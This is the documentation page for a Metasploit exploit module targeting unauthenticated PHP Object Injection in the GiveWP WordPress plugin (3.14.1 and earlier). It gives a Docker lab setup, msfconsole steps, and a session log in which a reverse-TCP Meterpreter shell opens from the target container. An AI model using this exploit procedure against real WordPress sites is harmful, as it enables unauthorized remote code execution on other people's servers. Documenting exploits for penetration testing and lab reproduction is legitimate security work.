adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
84ffa524e592d83e59cd88956e4ccfb2ec7bf96c
metasploit-gs/documentation/modules/exploit/multi/http/wp_givewp_rce.md
T

3.0 KiB
Raw Blame History

Vulnerable Application

This Metasploit module exploits an unauthenticated PHP Object Injection vulnerability in the GiveWP plugin for WordPress (versions <= 3.14.1). The vulnerability is present in the 'give_title' parameter, allowing attackers to inject a crafted PHP object leading to remote code execution (RCE) when combined with a suitable POP chain.

Setup

  1. Docker Compose Setup: Create the following docker-compose.yml file to set up a vulnerable WordPress environment:
services:
  db:
    image: mysql:8.0.27
    command: '--default-authentication-plugin=mysql_native_password'
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=somewordpress
      - MYSQL_DATABASE=wordpress
      - MYSQL_USER=wordpress
      - MYSQL_PASSWORD=wordpress
    expose:
      - 3306
      - 33060

  wordpress:
    image: wordpress:6.3.2
    ports:
      - "80:80"
    restart: always
    environment:
      - WORDPRESS_DB_HOST=db
      - WORDPRESS_DB_USER=wordpress
      - WORDPRESS_DB_PASSWORD=wordpress
      - WORDPRESS_DB_NAME=wordpress
volumes:
  db_data:
  1. Run Docker: docker compose up
  2. Access the WordPress instance at http://127.0.0.1 and complete the installation process
  3. Download and Install Vulnerable GiveWP Plugin:
  • Download the plugin: GiveWP 3.14.1
  • Unzip the plugin and copy it to the Docker container:
docker compose cp give wordpress:/var/www/html/wp-content/plugins
  • Access the WordPress instance at http://localhost and activate the GiveWP plugin via the admin dashboard.
  1. Create a Donation Form:
  • Navigate to the "Forms" section within the GiveWP plugin and click on "Add Form."
  • Select any form.
  • Configure the form as needed, publish it.

Options

No specific options need to be configured.

Verification Steps

  1. Start msfconsole.
  2. Use the module with use exploit/multi/http/wp_givewp_rce.
  3. Set RHOSTS, RPORT, and the necessary WordPress-specific options.
  4. Run the exploit.
  5. Gain a Meterpreter session.

Scenarios

GiveWP Plugin version: 3.14.1 (Dockerized WordPress Version 6.3.2)

Using cmd/linux/http/x64/meterpreter/reverse_tcp:

msf6 > use exploit/multi/http/wp_givewp_rce 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:8888

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.3.2
[+] Detected GiveWP Plugin version: 3.14.1
[+] The target appears to be vulnerable.
[+] Successfully retrieved form list. Available Form IDs: 8, 10, 13
[*] Using Form ID: 13 for exploitation.
[*] Sending stage (3045380 bytes) to 172.24.0.3
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.24.0.3:51272) at 2024-08-27 22:11:22 +0200

meterpreter > sysinfo 
Computer     : 172.24.0.3
OS           : Debian 11.8 (Linux 5.15.0-119-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
Reference in New Issue View Git Blame Copy Permalink